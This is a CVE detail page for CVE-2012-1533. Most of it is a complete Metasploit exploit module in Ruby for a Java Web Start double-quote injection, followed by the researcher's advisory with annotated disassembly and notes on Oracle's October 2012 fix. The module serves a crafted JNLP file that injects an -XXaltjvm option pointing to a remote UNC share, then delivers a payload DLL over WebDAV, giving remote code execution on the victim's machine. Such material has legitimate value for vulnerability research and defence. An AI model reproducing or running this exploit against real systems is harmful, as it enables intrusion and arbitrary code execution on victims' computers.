CVE-2012-1533 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # # ======================================================== # Java Web Start Double Quote Inject Remote Code Execution # ======================================================== # # Date: Jun 12 2012 (updated: Jun 6 2013) # Author: Rh0 # Version: At least Java 1.6.31 to 1.6.35 and 1.7.03 to 1.7.07 # Tested on: Windows XP SP3 EN and Windows 7 # CVE: 2012-1533 # # advisory: http://pastebin.com/eUucVage # ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Sun Java Web Start Double Quote Injection', 'Description' => %q{ This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. Parameters intial-heap-size and max-heap-size in a JNLP file can contain a double quote which is not properly sanitized when creating the command line for javaw.exe. This allows the injection of the -XXaltjvm option to load a jvm.dll from a remote UNC path into the java process. Thus an attacker can execute arbitrary code in the context of a browser user. This flaw was fixed in Oct. 2012 and affects JRE <= 1.6.35 and <= 1.7.07. In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. Alternatively an UNC path containing a jvm.dll can be specified with an own SMB server. }, 'Author' => [ # NOTE: module is completely based on and almost the same like jducks module for CVE-2012-0500 (Rev: 4369f73c) 'Rh0 <rh0 () z1p dot biz>', # discovery and msf module ], 'Version' => '0.0', 'References' => [ [ 'URL', 'http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/java_ws_vmargs.rb' ], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ], ], 'Platform' => 'win', 'Payload' => { 'Space' => 1024, 'BadChars' => '', 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" }, 'Targets' => [ [ 'Automatic', { } ], [ 'Java Runtime 1.6.31 to 1.6.35 and 1.7.03 to 1.7.07 on Windows x86', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], ], 'DefaultTarget' => 0, )) register_options( [ OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]), OptString.new('URIPATH', [ true, "The URI to use.", "/" ]), OptString.new('UNCPATH', [ false, 'Override the UNC path to use. (Use with a SMB server)' ]) ], self.class) end def auto_target(cli, request) agent = request.headers['User-Agent'] ret = nil #print_status("Agent: #{agent}") # Check for MSIE and/or WebDAV redirector requests if agent =~ /(Windows NT (5|6)\.(0|1|2)|MiniRedir\/(5|6)\.(0|1|2))/ ret = targets[1] elsif agent =~ /MSIE (6|7|8)\.0/ ret = targets[1] else print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") end ret end def on_request_uri(cli, request) # For this exploit, this does little besides ensures the user agent is a recognized one.. mytarget = target if target.name == 'Automatic' mytarget = auto_target(cli, request) if (not mytarget) send_not_found(cli) return end end # Special case to process OPTIONS for / if (request.method == 'OPTIONS' and request.uri == '/') process_options(cli, request, mytarget) return end # Discard requests for ico files if (request.uri =~ /\.ico$/i) send_not_found(cli) return end # If there is no subdirectory in the request, we need to redirect. if (request.uri == '/') or not (request.uri =~ /\/([^\/]+)\//) if (request.uri == '/') subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/' else subdir = request.uri + '/' end print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...") send_redirect(cli, subdir) return else share_name = $1 end # dispatch WebDAV requests based on method first case request.method when 'OPTIONS' process_options(cli, request, mytarget) when 'PROPFIND' process_propfind(cli, request, mytarget) when 'GET' process_get(cli, request, mytarget, share_name) when 'PUT' print_status("Sending 404 for PUT #{request.uri} ...") send_not_found(cli) else print_error("Unexpected request method encountered: #{request.method}") end end # # GET requests # def process_get(cli, request, target, share_name) print_status("Responding to \"GET #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}") # dispatch based on extension if (request.uri =~ /\.dll$/i) # # DLL requests sent by IE and the WebDav Mini-Redirector # print_status("Sending DLL to #{cli.peerhost}:#{cli.peerport}...") # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Generate a DLL based on the payload dll_data = generate_payload_dll({ :code => p.encoded }) # Send it :) send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' }) elsif (request.uri =~ /\.jnlp$/i) # # Send the jnlp document # # Prepare the UNC path... if (datastore['UNCPATH']) unc = datastore['UNCPATH'].dup else my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] unc = "\\\\" + my_host + "\\" + share_name end # NOTE: we ensure there's only a single backslash here since it will get escaped if unc[0,2] == "\\\\" unc.slice!(0, 1) end http_agent = Rex::Text.rand_text_alpha(8+rand(8)) # use initial-heap-size='"' to inject a double quote and max-heap-size=" -XXaltjvm=\\IP\share " to # inject a parameter into the command line of javaw.exe # codebase, href and application-desc parameters successfully suppress java splash jnlp_data = <<-EOS <?xml version="1.0" encoding="UTF-8"?> <jnlp version="1" codebase="#{Rex::Text.rand_text_alpha(rand(10)+10)}" href="#{Rex::Text.rand_text_alpha(rand(10)+10)}.jnlp"> <information> <title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title> <vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor> <description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description> </information> <resources> <java version="1.6+" initial-heap-size='"' max-heap-size=" -XXaltjvm=#{unc} " /> </resources> <application-desc progress-class="#{Rex::Text.rand_text_alpha(rand(10)+10)}" /> </jnlp> EOS print_status("Sending JNLP to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, jnlp_data, { 'Content-Type' => 'application/x-java-jnlp-file' }) else print_status("Sending redirect to the JNLP file to #{cli.peerhost}:#{cli.peerport}") jnlp_name = Rex::Text.rand_text_alpha(8 + rand(8)) jnlp_path = get_resource() if jnlp_path[-1,1] != '/' jnlp_path << '/' end jnlp_path << request.uri.split('/')[-1] << '/' jnlp_path << jnlp_name << ".jnlp" send_redirect(cli, jnlp_path, '') end end # # OPTIONS requests sent by the WebDav Mini-Redirector # def process_options(cli, request, target) print_status("Responding to WebDAV \"OPTIONS #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}") headers = { #'DASL' => '<DAV:sql>', #'DAV' => '1, 2', 'Allow' => 'OPTIONS, GET, PROPFIND', 'Public' => 'OPTIONS, GET, PROPFIND' } send_response(cli, '', headers) end # # PROPFIND requests sent by the WebDav Mini-Redirector # def process_propfind(cli, request, target) path = request.uri print_status("Received WebDAV \"PROPFIND #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}") body = '' if (path =~ /\.dll$/i) # Response for the DLL print_status("Sending DLL multistatus for #{path} ...") #<lp1:getcontentlength>45056</lp1:getcontentlength> body = %Q|<?xml version="1.0" encoding="utf-8"?> <D:multistatus xmlns:D="DAV:"> <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>#{path}</D:href> <D:propstat> <D:prop> <lp1:resourcetype/> <lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> <lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified> <lp1:getetag>"39e0132-b000-43c6e5f8d2f80"</lp1:getetag> <lp2:executable>F</lp2:executable> <D:lockdiscovery/> <D:getcontenttype>application/octet-stream</D:getcontenttype> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> </D:multistatus> | elsif (path =~ /\/$/) or (not path.sub('/', '').index('/')) # Response for anything else (generally just /) print_status("Sending directory multistatus for #{path} ...") body = %Q|<?xml version="1.0" encoding="utf-8"?> <D:multistatus xmlns:D="DAV:"> <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>#{path}</D:href> <D:propstat> <D:prop> <lp1:resourcetype><D:collection/></lp1:resourcetype> <lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> <lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified> <lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag> <D:lockdiscovery/> <D:getcontenttype>httpd/unix-directory</D:getcontenttype> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> </D:multistatus> | else print_status("Sending 404 for #{path} ...") send_not_found(cli) return end # send the response resp = create_response(207, "Multi-Status") resp.body = body resp['Content-Type'] = 'text/xml' cli.send_response(resp) end # # Make sure we're on the right port/path to support WebDAV # def exploit if !datastore['UNCPATH'] && (datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/') raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/' end super end end =begin ========================================================= Java Web Start: The next Quote Inject Bug (CVE 2012-1533) ========================================================= Hello all, This bug is different from CVE-2012-0500 which was disclosed on Feb. 15 2012, but allows remote code execution in the same way. ====================== Vulnerability Overview ====================== There exists an input validation vulnerability in at least Java Web Start 1.6.35 and 1.7.07 when parsing JNLP files. A flaw exists in the routine which performs checks on the parameter values from a JNLP file. It allows the injection of non escaped double quotes (") into parameters of the command line of javaw.exe. Parameters "intial-heap-size" and "max-heap-size" in a JNLP file can contain a double quote which is not properly sanitized when creating the command line for javaw.exe. This makes it possible to get a command line parameter with a value consisting only of one double quote injected. Further this allows manipulating the command line and the injection of e.g. the "-XXaltjvm" option leading to RCE. ====================== Vulnerability Details ====================== Notes: ------ [*] A JNLP parameter will be refered to by name=value (e.g.: initial-heap-size='64m"' ) [*] Analysis is done on WinXP 32Bit SP3 EN with Oracle JRE 1.6.31 [*] javaws.exe has the base address of 0x00400000 in memory [*] Arrows (-->) indicate code continuation on next address block ------ Vulnerable program flow: ------------------------ [*] If a JNLP file is opened by javaws.exe, it is read into memory and saved temporary in %TEMP%. [*] JNLP parameters are parsed: [a] Check if a JNLP value begins with a single or a double quote: (EAX points to a value of JNLP parameter enclosed with single quotes e.g.: '64m"' ; note the double quote inside) 00404D60 MOV CL,BYTE PTR DS:[EAX] ; CL: 1st char of '64m"' (single quote = 0x27) 00404D62 CMP CL,22 ; check for double quote 00404D65 MOV DWORD PTR DS:[4227C4],EAX 00404D6A JE SHORT javaws.00404D9F ; jmp is not taken 00404D6C CMP CL,27 ; check for single quote 00404D6F JE SHORT javaws.00404D9F ; jmp is taken --> ... [b] strip quotes which enclose the JNLP value and store it: 00404D9F INC EAX ; points to 2nd char of JNLP value (1st char after single quote) 00404DA0 MOV DL,CL ; DL: 0x27 (single quote) 00404DA2 MOV CL,BYTE PTR DS:[EAX] ; CL: 2nd char of JNLP value (0x36) 00404DA4 MOV DWORD PTR DS:[4227C4],EAX 00404DA9 MOV ESI,EAX 00404DAB JMP SHORT javaws.00404DB4 ; start loop 00404DAD /CMP CL,DL ; compare char of JNLP value to single quote 00404DAF |JE SHORT javaws.00404DB8 ; loop until another single quote in JNLP value is encountered 00404DB1 |INC ESI ; increase pointer to chars in JNLP value 00404DB2 |MOV CL,BYTE PTR DS:[ESI] ; put next char of value into CL 00404DB4 TEST CL,CL 00404DB6 \JNZ SHORT javaws.00404DAD 00404DB8 PUSH EAX 00404DB9 PUSH 6 00404DBB MOV EAX,ESI 00404DBD CALL javaws.00404BF8 ; store stripped JNLP value ( in the example case: 64m" ) ... [*] The stripped JNLP values are used to construct the command line parameter for javaw.exe (e.g.: for JNLP parameter with name initial-heap-size) : 00401895 PUSH javaws.00418330 ; ASCII: -Xms%s 0040189A PUSH EBX 0040189B PUSH EAX 0040189C CALL javaws.00406D26 ; construct command line parameter with -Xms%s and 64m" 004018A1 LEA EAX,DWORD PTR SS:[EBP-400]; EAX points to command line parameter -Xms64m" (with still one double quote) ... [*] All constructed command line parameters for javaw.exe are sane checked: 00402B02 CALL javaws.00406911 ; run check routine --> ... 00406911 PUSH EBP 00406912 MOV EBP,ESP 00406914 PUSH EBX 00406915 PUSH ESI 00406916 PUSH EDI 00406917 MOV EDI,DWORD PTR SS:[EBP+10] ; ESI: pointer to pointers to command line parameters 0040691A XOR EBX,EBX 0040691C CMP DWORD PTR DS:[EDI],EBX 0040691E MOV ESI,EDI 00406920 JE SHORT javaws.00406933 00406922 /PUSH DWORD PTR DS:[ESI] ; push pointer to command line parameter 00406924 |CALL javaws.00406170 ; run check on command line parameter --> 00406929 |MOV DWORD PTR DS:[ESI],EAX 0040692B |ADD ESI,4 ; ESI: pointer to next command line parameter 0040692E |CMP DWORD PTR DS:[ESI],EBX 00406930 |POP ECX 00406931 \JNZ SHORT javaws.00406922 ; loop until end of pointer list ... 00406170 PUSH EBX 00406171 MOV EBX,DWORD PTR SS:[ESP+8] ; EBX: pointer to command line parameter ( e.g.: -Xms64m" ) 00406175 TEST EBX,EBX 00406177 JNZ SHORT javaws.0040617D ; --> ... 0040617D MOV EAX,EBX 0040617F LEA EDX,DWORD PTR DS:[EAX+1] ; EDX: pointer to command line parameter without hyphen ( Xms64m" ) 00406182 /MOV CL,BYTE PTR DS:[EAX] 00406184 |INC EAX 00406185 |TEST CL,CL 00406187 \JNZ SHORT javaws.00406182 00406189 PUSH ESI ; pointer to pointer of -Xms64m" 0040618A SUB EAX,EDX ; EAX: length of Xms64m"\x00 0040618C PUSH javaws.004199B8 ; ASCII \x20\x09 (space and tab) 00406191 PUSH EBX ; pointer to -Xms64m" 00406192 MOV ESI,EAX 00406194 CALL javaws.00409590 ; check for space and tab in -Xms64m" ; return 0x0 in EAX if it's not found 00406199 TEST EAX,EAX ; EAX: 0x0 for -Xms64m" 0040619B POP ECX 0040619C POP ECX 0040619D JNZ SHORT javaws.004061A8 ; jmp to routine which checks and escapes " and \ is not taken !! The checks are not performed !! 0040619F PUSH EBX 004061A0 CALL javaws.004127F4 ; copy of -Xms64m" (~ strdup) 004061A5 POP ECX 004061A6 JMP SHORT javaws.00406215 ; jmp over the check routines !! ---------------------> 00406215 004061A8 CMP ESI,1 004061AB JLE SHORT javaws.004061B9 004061AD CMP BYTE PTR DS:[EBX],22 004061B0 JNZ SHORT javaws.004061B9 004061B2 CMP BYTE PTR DS:[ESI+EBX-1],22 004061B7 JE SHORT javaws.0040619F 004061B9 XOR EAX,EAX 004061BB TEST ESI,ESI 004061BD LEA EDX,DWORD PTR DS:[ESI+3] 004061C0 JLE SHORT javaws.004061D5 004061C2 /MOV CL,BYTE PTR DS:[EAX+EBX] 004061C5 |CMP CL,22 004061C8 |JE SHORT javaws.004061CF 004061CA |CMP CL,5C 004061CD |JNZ SHORT javaws.004061D0 004061CF |INC EDX 004061D0 |INC EAX 004061D1 |CMP EAX,ESI 004061D3 \JL SHORT javaws.004061C2 004061D5 PUSH EDX 004061D6 CALL javaws.004089CD 004061DB TEST EAX,EAX 004061DD POP ECX 004061DE JE SHORT javaws.00406215 004061E0 XOR ECX,ECX 004061E2 PUSH EDI 004061E3 INC ECX 004061E4 XOR EDI,EDI 004061E6 TEST ESI,ESI 004061E8 MOV BYTE PTR DS:[EAX],22 ; *** prepend command line parameter with double quote 004061EB JLE SHORT javaws.0040620B 004061ED /MOV DL,BYTE PTR DS:[EDI+EBX] 004061F0 |CMP DL,22 ; *** check for " 004061F3 |JE SHORT javaws.004061FA 004061F5 |CMP DL,5C ; *** check for \ 004061F8 |JNZ SHORT javaws.004061FF 004061FA |MOV BYTE PTR DS:[EAX+ECX],5C ; *** escape " or \ with \ (" becomes \" and \ becomes \\ ) 004061FE |INC ECX 004061FF |MOV DL,BYTE PTR DS:[EDI+EBX] 00406202 |MOV BYTE PTR DS:[EAX+ECX],DL 00406205 |INC ECX 00406206 |INC EDI 00406207 |CMP EDI,ESI 00406209 \JL SHORT javaws.004061ED 0040620B ADD ECX,EAX 0040620D MOV BYTE PTR DS:[ECX],22 ; *** append command line parameter with double quote to enclose it 00406210 MOV BYTE PTR DS:[ECX+1],0 00406214 POP EDI 00406215 POP ESI ; -----------------> we land here 00406216 POP EBX 00406217 RETN ... [*] At this point we have circumvented the checks and our JNLP parameter initial-heap-size='64m"' becomes the command line parameter Xms64m". Basically this happens due to the possibility to enclose double quotes inside single quoted JNLP values (see [a] and [b]) and unsufficient checking for double quotes inside the constructed command line parameter (see 0040619D ). [*] We can now inject command line parameters via the JNLP parameter max-heap-size=" -ParamA=InjectA -ParamB=InjectB " which will become the command line parameter "-Xmx -ParamA=InjectA -ParamB=InjectB " [*] The command line for javaw.exe then contains the two parameters after each other, so we get: javaw.exe [...] -Xms64m" "-Xmx -ParamA=InjectA -ParamB=InjectB " [...] "-another parameter X" "-another parameter Y " [...] [*] Although the javaw.exe command line is corrupted due to unclosed and wrongly escaped double quotes an injection works with -XXaltjvm=\IP\evilshare. Javaw.exe will search for a jvm.dll on a remote unc location \\IP\evilshare (which can be on a webserver) and execute it. === Fix === [*] This vulnerability was fixed by Oracle in Oct. 2012 http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html The fix inserted an additional check to "initial-heap-size" and "max-heap-size" parameters. Comparison between javaws.exe 10.7.2.10 (Java 1.7.07) and javaws.exe 10.9.2.05 (Java 1.7.09) yields the following: [a] All functions are identical except sub_404BB9 and a new function sub_406E0E was added: http://s18.postimg.org/gy04n3jw9/diff_1_7_7_1_7_9.png [b] The only difference in sub_404BB9 between the two versions is the use of sub_406E0E to validate the parameter values gained by sub_405BD5: http://s7.postimg.org/hjgnecod7/sub_404bb9_diffed.png [*] An old deprecated self made fix is available which fixed this issue in a different way, back in the days when it was a 0day: http://pastebin.com/9RztwVez Cheers, Rh0 =end